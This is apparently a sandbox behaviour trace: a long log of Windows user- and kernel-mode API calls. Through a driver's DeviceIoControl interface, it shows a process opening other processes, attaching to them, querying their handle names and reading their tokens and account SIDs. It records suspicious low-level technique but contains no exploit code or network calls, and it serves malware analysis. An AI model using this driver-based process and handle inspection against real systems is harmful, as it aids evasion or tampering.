ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a437770, HandleInformation=0x0) returned 0x0 [0291.841] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.841] PsReleaseProcessExitSynchronization () returned 0x2 [0291.841] ObfDereferenceObject (Object=0xffffe00068483840) returned 0x2800b [0291.841] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.841] ObfDereferenceObject (Object=0xffffe0006a437770) returned 0x7fff [0291.841] IoCompleteRequest () returned 0x0 [0291.841] PsLookupProcessByProcessId (in: ProcessId=0xb04, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.842] PsAcquireProcessExitSynchronization () returned 0x0 [0291.842] KeStackAttachProcess (in: PROCESS=0xffffe00068483840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00068483840, ApcState=0xffffd000ac0cf400) [0291.842] ObReferenceObjectByHandle (in: Handle=0x118, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f21ba0, HandleInformation=0x0) returned 0x0 [0291.842] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.842] PsReleaseProcessExitSynchronization () returned 0x2 [0291.842] ObfDereferenceObject (Object=0xffffe00068483840) returned 0x2800a [0291.842] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.842] ObfDereferenceObject (Object=0xffffe00069f21ba0) returned 0x7fff [0291.842] IoCompleteRequest () returned 0x0 [0291.842] PsLookupProcessByProcessId (in: ProcessId=0xb04, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.842] PsAcquireProcessExitSynchronization () returned 0x0 [0291.842] KeStackAttachProcess (in: PROCESS=0xffffe00068483840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00068483840, ApcState=0xffffd000ac0cf400) [0291.842] ObReferenceObjectByHandle (in: Handle=0x19c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069104090, HandleInformation=0x0) returned 0x0 [0291.842] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.842] PsReleaseProcessExitSynchronization () returned 0x2 [0291.842] ObfDereferenceObject (Object=0xffffe00068483840) returned 0x28009 [0291.842] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.842] ObfDereferenceObject (Object=0xffffe00069104090) returned 0x8000 [0291.842] IoCompleteRequest () returned 0x0 [0291.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e4) returned 0x188 [0291.842] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.842] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe00069ba2080, HandleInformation=0x0) returned 0x0 [0291.842] ObOpenObjectByPointer (in: Object=0xffffe00069ba2080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000a5c) returned 0x0 [0291.842] ObfDereferenceObject (Object=0xffffe00069ba2080) returned 0x3001e [0291.842] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000a5c, DesiredAccess=0x8, TokenHandle=0xffffe0006a8c7380 | out: TokenHandle=0xffffe0006a8c7380*=0x18c) returned 0x0 [0291.842] ZwClose (Handle=0xffffffff80000a5c) returned 0x0 [0291.842] IoCompleteRequest () returned 0x0 [0291.842] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.842] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.843] CloseHandle (hObject=0x18c) returned 1 [0291.843] CloseHandle (hObject=0x188) returned 1 [0291.843] PsLookupProcessByProcessId (in: ProcessId=0x7e4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.843] PsAcquireProcessExitSynchronization () returned 0x0 [0291.843] KeStackAttachProcess (in: PROCESS=0xffffe00069ba2080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ba2080, ApcState=0xffffd000ac0cf400) [0291.843] ObReferenceObjectByHandle (in: Handle=0x4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a450090, HandleInformation=0x0) returned 0x0 [0291.843] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.843] PsReleaseProcessExitSynchronization () returned 0x2 [0291.843] ObfDereferenceObject (Object=0xffffe00069ba2080) returned 0x2801c [0291.843] ObQueryNameString (in: Object=0xffffe0006a450090, ObjectNameInfo=0xffffe0006a6bc044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6bc044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.843] ObfDereferenceObject (Object=0xffffe0006a450090) returned 0x7ecb [0291.843] IoCompleteRequest () returned 0x0 [0291.843] PsLookupProcessByProcessId (in: ProcessId=0x7e4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.843] PsAcquireProcessExitSynchronization () returned 0x0 [0291.843] KeStackAttachProcess (in: PROCESS=0xffffe00069ba2080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ba2080, ApcState=0xffffd000ac0cf400) [0291.844] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a4b84e0, HandleInformation=0x0) returned 0x0 [0291.844] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.844] PsReleaseProcessExitSynchronization () returned 0x2 [0291.844] ObfDereferenceObject (Object=0xffffe00069ba2080) returned 0x2801b [0291.844] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069ba5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069ba5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.844] ObfDereferenceObject (Object=0xffffe0006a4b84e0) returned 0x7fff [0291.844] IoCompleteRequest () returned 0x0 [0291.844] PsLookupProcessByProcessId (in: ProcessId=0x7e4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.844] PsAcquireProcessExitSynchronization () returned 0x0 [0291.844] KeStackAttachProcess (in: PROCESS=0xffffe00069ba2080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ba2080, ApcState=0xffffd000ac0cf400) [0291.844] ObReferenceObjectByHandle (in: Handle=0x1a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069185090, HandleInformation=0x0) returned 0x0 [0291.844] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.844] PsReleaseProcessExitSynchronization () returned 0x2 [0291.844] ObfDereferenceObject (Object=0xffffe00069ba2080) returned 0x2801a [0291.844] ObQueryNameString (in: Object=0xffffe00069185090, ObjectNameInfo=0xffffe00068a61044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00068a61044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.844] ObfDereferenceObject (Object=0xffffe00069185090) returned 0x7fff [0291.844] IoCompleteRequest () returned 0x0 [0291.844] PsLookupProcessByProcessId (in: ProcessId=0x7e4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.844] PsAcquireProcessExitSynchronization () returned 0x0 [0291.844] KeStackAttachProcess (in: PROCESS=0xffffe00069ba2080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ba2080, ApcState=0xffffd000ac0cf400) [0291.844] ObReferenceObjectByHandle (in: Handle=0x1a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a636660, HandleInformation=0x0) returned 0x0 [0291.844] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.844] PsReleaseProcessExitSynchronization () returned 0x2 [0291.844] ObfDereferenceObject (Object=0xffffe00069ba2080) returned 0x28019 [0291.844] ObQueryNameString (in: Object=0xffffe0006a636660, ObjectNameInfo=0xffffe00068524044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00068524044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.844] ObfDereferenceObject (Object=0xffffe0006a636660) returned 0x7fff [0291.844] IoCompleteRequest () returned 0x0 [0291.844] PsLookupProcessByProcessId (in: ProcessId=0x7e4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.844] PsAcquireProcessExitSynchronization () returned 0x0 [0291.844] KeStackAttachProcess (in: PROCESS=0xffffe00069ba2080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ba2080, ApcState=0xffffd000ac0cf400) [0291.844] ObReferenceObjectByHandle (in: Handle=0x1a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a909760, HandleInformation=0x0) returned 0x0 [0291.844] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.844] PsReleaseProcessExitSynchronization () returned 0x2 [0291.844] ObfDereferenceObject (Object=0xffffe00069ba2080) returned 0x28018 [0291.844] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6a1044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6a1044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.844] ObfDereferenceObject (Object=0xffffe0006a909760) returned 0x8000 [0291.844] IoCompleteRequest () returned 0x0 [0291.844] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd00) returned 0x188 [0291.844] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.844] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe00069974340, HandleInformation=0x0) returned 0x0 [0291.844] ObOpenObjectByPointer (in: Object=0xffffe00069974340, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000a5c) returned 0x0 [0291.845] ObfDereferenceObject (Object=0xffffe00069974340) returned 0x2801e [0291.845] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000a5c, DesiredAccess=0x8, TokenHandle=0xffffe0006a8c7380 | out: TokenHandle=0xffffe0006a8c7380*=0x18c) returned 0x0 [0291.845] ZwClose (Handle=0xffffffff80000a5c) returned 0x0 [0291.845] IoCompleteRequest () returned 0x0 [0291.845] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.845] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.845] CloseHandle (hObject=0x18c) returned 1 [0291.846] CloseHandle (hObject=0x188) returned 1 [0291.846] PsLookupProcessByProcessId (in: ProcessId=0xd00, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.846] PsAcquireProcessExitSynchronization () returned 0x0 [0291.846] KeStackAttachProcess (in: PROCESS=0xffffe00069974340, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069974340, ApcState=0xffffd000ac0cf400) [0291.846] ObReferenceObjectByHandle (in: Handle=0x4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a13cd50, HandleInformation=0x0) returned 0x0 [0291.846] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.846] PsReleaseProcessExitSynchronization () returned 0x2 [0291.846] ObfDereferenceObject (Object=0xffffe00069974340) returned 0x2001c [0291.846] ObQueryNameString (in: Object=0xffffe0006a13cd50, ObjectNameInfo=0xffffe0006a717044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a717044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.846] ObfDereferenceObject (Object=0xffffe0006a13cd50) returned 0x7ef4 [0291.846] IoCompleteRequest () returned 0x0 [0291.846] PsLookupProcessByProcessId (in: ProcessId=0xd00, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.846] PsAcquireProcessExitSynchronization () returned 0x0 [0291.846] KeStackAttachProcess (in: PROCESS=0xffffe00069974340, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069974340, ApcState=0xffffd000ac0cf400) [0291.846] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069e22db0, HandleInformation=0x0) returned 0x0 [0291.846] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.846] PsReleaseProcessExitSynchronization () returned 0x2 [0291.846] ObfDereferenceObject (Object=0xffffe00069974340) returned 0x2001b [0291.846] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.846] ObfDereferenceObject (Object=0xffffe00069e22db0) returned 0x7fff [0291.846] IoCompleteRequest () returned 0x0 [0291.846] PsLookupProcessByProcessId (in: ProcessId=0xd00, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.846] PsAcquireProcessExitSynchronization () returned 0x0 [0291.846] KeStackAttachProcess (in: PROCESS=0xffffe00069974340, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069974340, ApcState=0xffffd000ac0cf400) [0291.846] ObReferenceObjectByHandle (in: Handle=0x1a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a530c60, HandleInformation=0x0) returned 0x0 [0291.846] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.846] PsReleaseProcessExitSynchronization () returned 0x2 [0291.846] ObfDereferenceObject (Object=0xffffe00069974340) returned 0x2001a [0291.846] ObQueryNameString (in: Object=0xffffe0006a530c60, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.846] ObfDereferenceObject (Object=0xffffe0006a530c60) returned 0x7fff [0291.846] IoCompleteRequest () returned 0x0 [0291.846] PsLookupProcessByProcessId (in: ProcessId=0xd00, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.846] PsAcquireProcessExitSynchronization () returned 0x0 [0291.846] KeStackAttachProcess (in: PROCESS=0xffffe00069974340, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069974340, ApcState=0xffffd000ac0cf400) [0291.846] ObReferenceObjectByHandle (in: Handle=0x1a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069bc2760, HandleInformation=0x0) returned 0x0 [0291.846] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.846] PsReleaseProcessExitSynchronization () returned 0x2 [0291.846] ObfDereferenceObject (Object=0xffffe00069974340) returned 0x20019 [0291.846] ObQueryNameString (in: Object=0xffffe00069bc2760, ObjectNameInfo=0xffffe0006a5317c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5317c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.846] ObfDereferenceObject (Object=0xffffe00069bc2760) returned 0x7fff [0291.846] IoCompleteRequest () returned 0x0 [0291.847] PsLookupProcessByProcessId (in: ProcessId=0xd00, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.847] PsAcquireProcessExitSynchronization () returned 0x0 [0291.847] KeStackAttachProcess (in: PROCESS=0xffffe00069974340, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069974340, ApcState=0xffffd000ac0cf400) [0291.847] ObReferenceObjectByHandle (in: Handle=0x1a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a691090, HandleInformation=0x0) returned 0x0 [0291.847] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.847] PsReleaseProcessExitSynchronization () returned 0x2 [0291.847] ObfDereferenceObject (Object=0xffffe00069974340) returned 0x20018 [0291.847] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.847] ObfDereferenceObject (Object=0xffffe0006a691090) returned 0x8000 [0291.847] IoCompleteRequest () returned 0x0 [0291.847] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef8) returned 0x188 [0291.847] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.847] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe0006a660080, HandleInformation=0x0) returned 0x0 [0291.847] ObOpenObjectByPointer (in: Object=0xffffe0006a660080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000a5c) returned 0x0 [0291.847] ObfDereferenceObject (Object=0xffffe0006a660080) returned 0x3001e [0291.847] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000a5c, DesiredAccess=0x8, TokenHandle=0xffffe0006a8c7380 | out: TokenHandle=0xffffe0006a8c7380*=0x18c) returned 0x0 [0291.847] ZwClose (Handle=0xffffffff80000a5c) returned 0x0 [0291.847] IoCompleteRequest () returned 0x0 [0291.847] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.847] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.847] CloseHandle (hObject=0x18c) returned 1 [0291.848] CloseHandle (hObject=0x188) returned 1 [0291.848] PsLookupProcessByProcessId (in: ProcessId=0xef8, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.848] PsAcquireProcessExitSynchronization () returned 0x0 [0291.848] KeStackAttachProcess (in: PROCESS=0xffffe0006a660080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a660080, ApcState=0xffffd000ac0cf400) [0291.848] ObReferenceObjectByHandle (in: Handle=0x4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069051420, HandleInformation=0x0) returned 0x0 [0291.848] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.848] PsReleaseProcessExitSynchronization () returned 0x2 [0291.848] ObfDereferenceObject (Object=0xffffe0006a660080) returned 0x2801c [0291.848] ObQueryNameString (in: Object=0xffffe00069051420, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.848] ObfDereferenceObject (Object=0xffffe00069051420) returned 0x7ed9 [0291.848] IoCompleteRequest () returned 0x0 [0291.848] PsLookupProcessByProcessId (in: ProcessId=0xef8, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.848] PsAcquireProcessExitSynchronization () returned 0x0 [0291.848] KeStackAttachProcess (in: PROCESS=0xffffe0006a660080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a660080, ApcState=0xffffd000ac0cf400) [0291.848] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a4c6670, HandleInformation=0x0) returned 0x0 [0291.848] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.848] PsReleaseProcessExitSynchronization () returned 0x2 [0291.848] ObfDereferenceObject (Object=0xffffe0006a660080) returned 0x2801b [0291.848] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.848] ObfDereferenceObject (Object=0xffffe0006a4c6670) returned 0x7fff [0291.848] IoCompleteRequest () returned 0x0 [0291.848] PsLookupProcessByProcessId (in: ProcessId=0xef8, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.848] PsAcquireProcessExitSynchronization () returned 0x0 [0291.848] KeStackAttachProcess (in: PROCESS=0xffffe0006a660080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a660080, ApcState=0xffffd000ac0cf400) [0291.848] ObReferenceObjectByHandle (in: Handle=0x1a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a717e50, HandleInformation=0x0) returned 0x0 [0291.848] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.848] PsReleaseProcessExitSynchronization () returned 0x2 [0291.848] ObfDereferenceObject (Object=0xffffe0006a660080) returned 0x2801a [0291.848] ObQueryNameString (in: Object=0xffffe0006a717e50, ObjectNameInfo=0xffffe00068423044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00068423044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.848] ObfDereferenceObject (Object=0xffffe0006a717e50) returned 0x7fff [0291.848] IoCompleteRequest () returned 0x0 [0291.848] PsLookupProcessByProcessId (in: ProcessId=0xef8, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.848] PsAcquireProcessExitSynchronization () returned 0x0 [0291.848] KeStackAttachProcess (in: PROCESS=0xffffe0006a660080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a660080, ApcState=0xffffd000ac0cf400) [0291.848] ObReferenceObjectByHandle (in: Handle=0x1a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a738090, HandleInformation=0x0) returned 0x0 [0291.848] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.848] PsReleaseProcessExitSynchronization () returned 0x2 [0291.848] ObfDereferenceObject (Object=0xffffe0006a660080) returned 0x28019 [0291.848] ObQueryNameString (in: Object=0xffffe0006a738090, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.848] ObfDereferenceObject (Object=0xffffe0006a738090) returned 0x7fff [0291.848] IoCompleteRequest () returned 0x0 [0291.848] PsLookupProcessByProcessId (in: ProcessId=0xef8, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.848] PsAcquireProcessExitSynchronization () returned 0x0 [0291.849] KeStackAttachProcess (in: PROCESS=0xffffe0006a660080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a660080, ApcState=0xffffd000ac0cf400) [0291.849] ObReferenceObjectByHandle (in: Handle=0x1a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a374490, HandleInformation=0x0) returned 0x0 [0291.849] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.849] PsReleaseProcessExitSynchronization () returned 0x2 [0291.849] ObfDereferenceObject (Object=0xffffe0006a660080) returned 0x28018 [0291.849] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a66b7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a66b7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.849] 